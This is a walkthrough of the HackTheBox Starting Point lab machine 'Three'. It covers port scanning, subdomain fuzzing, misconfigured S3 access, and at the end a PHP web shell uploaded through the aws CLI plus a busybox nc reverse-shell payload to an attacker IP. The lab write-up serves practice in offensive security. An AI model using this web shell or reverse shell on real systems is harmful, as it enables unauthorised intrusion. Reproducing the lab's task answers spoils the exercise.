Starting Point HackTheBox

Machine name: Three

Task 1

• How many TCP ports are open?

First Let’s scan the target

Answer: 2 

Task 2

• What is the domain of the email address provided in the “Contact” section of the website?

Going over to the web page shows this

Checking the Contact page shows this email address

We can see the domain name

Answer:  thetoppers.htb 

Task 3

• In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?

For this we need to edit our /etc/hosts file so that it can resolve the hostname to ip address

Answer: /etc/hosts

Task 4

• Which sub-domain is discovered during further enumeration?

Let us fuzz for subdomain using ffuf

We see that the result shows that the s3 sub domain is up

So i’ll add s3.thetoppers.htb to my /etc/hosts file

Answer: s3.thetoppers.htb

Task 5

• Which service is running on the discovered sub-domain?

Since we see the sub domain name looks interesting i’ll search it up on google

From the result we can tell the answer is Amazon S3

Answer: Amazon S3

Task 6

• Which command line utility can be used to interact with the service running on the discovered sub-domain?

Searching google for this gives the answer

Answer: awscli

Task 7

• Which command is used to set up the AWS CLI installation?

I installed aws tool from here

So to set up aws we use aws configure

Answer: aws configure

Task 8

• What is the command used by the above utility to list all of the S3 buckets?

To list all of the S3 bucket we use:

Answer: aws s3 ls 

But doing that on the target shows this

It is trying to access the main amazon aws endpoint

But we just need to reference it to the endpoint already give to us

So I did this

Cool we see the index.php & .htaccess file

Task 9

• This server is configured to run files written in what web scripting language?

Back to the web app

Using wappalyzer shows the language of the web server

Answer: PHP

Task 10

• Submit the root flag

Since we know the aws allows write access we can put files to the aws

But let us first download the index.php file

Opening it shows it is the web root directory of the web server on port 80

Cool. So this means we can upload our own file to the server

I created a file with this content names shell.php

<?php system($_GET['cmd']); ?>

Now i uploaded it to the aws

aws s3 --endpoint http://s3.thetoppers.htb cp shell.php s3://thetoppers.htb/

Our shell is uploaded we can now access it from the web server

We are user www-data let’s get a reverse shell

Payload: http://thetoppers.htb/shell.php?cmd=busybox%20nc%2010.10.14.27%201337%20-e%20/bin/bash

The flag is there :)